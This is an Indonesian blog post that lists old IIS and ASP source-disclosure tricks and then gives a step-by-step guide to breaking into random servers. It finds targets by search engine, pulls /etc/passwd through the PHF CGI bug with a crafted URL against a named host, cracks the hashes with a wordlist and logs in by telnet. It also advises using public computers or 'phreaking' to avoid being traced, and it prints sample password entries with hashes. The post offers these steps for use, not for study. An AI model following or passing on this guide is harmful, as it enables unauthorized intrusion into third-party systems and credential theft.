1. IIS 4.0 IIshack Vulnerabillity
dapat ditemukan di http://www.technotronic.com
2. Active Server Pages (ASP) Vulnerabillity
1. (ASP DOT Bug Vulnerabillity) (kesalahan titik pada setiap akhir
.ASP)
di lihat di http://oliver.efri.hr/~crv/security/bugs/NT/asp.html
vulnerabillity-nya dapat di ketahui dengan penambahan titik (.) pada setiap akhir asp
misal, http://192.168.51.101/code/example.asp.
namun dalam perkembangannya diperbaiki oleh Microsoft USA, dan menimbulkan lagi Vulnerabillity baru yaitu:
http://192.168.51.101/code/example%2easp
jadi menambahkan %2e (tanpa titik/disambung) dengan asp
2. ASP Alternate Data Streams Vulnerabillity
penambahan titik pada file.asp, yaitu
http://192.168.51.101/scripts/file.asp
menjadi
http://192.168.51.101/scripts/file.asp::$DATA
(sumber, Hacking Exposed)
perlu beberapa bahan yaitu:
1. Web browser (minimal 3.0)
2. Program cracker (gunakan crackerjack atau starcracker)
3. daftar kata (wordlist/dictionary) - GlobalKOS KOSdict - 11.2 MB
4. KOmputer umum
step:
1. buka 2 window
2. window yang 1, dipakai untuk membuka www.altavista.com/sk,
dengan keywordnya, host:ac.il) jika menginginkan host2 dari israel,
host:co.jp, jika menginginkan yang dari jepang. trus liat hasilnya
3. window yang ke 2, digunakan untuk mencari pasw dari host2 yang didapat
pada window 1, caranya dengan memasukan :
http://nama.target.kamu/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
misalnya
http://eris.wisdom.weizmann.ac.il/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
4. hasilnya kemungkinan ada 4.
1. error..message...(kalo udah ginian, maka harus kembali lagi ke awal...)
2. smile, you're on candid camera...( artinya, nomor ip kita direkam, dan disimpan diserver si target)
3. muncul tulisan: root:*0:0:SystemAdministrator:/:/bin/cshsysadm:*:1:1:BokephMemendez:/usr/adm:/bin/bash.
perhatikan bahwa setelah tanda titik dua yang pertama, selalu muncul tanda asteriks (*). ini artinya
kamu berhasil mendapatkan password hanya saja sayangnya sang fil sudah dishadow...harus ada
akses ROOT, terpaksa harus ke target berikutnya...
4. muncul tulisan: root:OUK9b8RqMRVNs:0:0:root,,,,:/:/bin/cshsysadm:*:0:0:system V administration:/usr/
admin:/bin/shdiag:*:0:996: HardwareDiagnostics:/usr/diags:/bin/csh Leonid:F5AymuqmXVFCU:1399:8:Leonid
Bebek:/usr/leonid:/bin/tcsh
(dalam kasus ini: langsung bisa dapat file passwd asli! tanpa shadow!!!)
5. segera setelahn menndapat file Passwd didapatkan, "save as" dan simpan
ditempat yang aman, terserah boleh kalo mau lanjut ke target berikut atau segra
mengcrack. patikan kom,puter untuk ngecrack aman dan bisa dibiarkan menganggur
selama berjam-jam atau kalo file passwdnya memang besar, bisa berhari-hari.
6. jalankan program crack, gunakan wordlist atas file passwd yang baru dipanen
7. kalo sudah berhasil ngecrack, kamu sudah siap untuk memakai shell unix baru.
8. telnet ke servernya, jangan lupa....gunakan komp umum, kalo pribadi....di phreak dulu.
(sumber, Anonymous)
Posting Komentar
Blog Dofolow , Tapi Tolong jangan nyepam dan ada kata kata yang tidak baik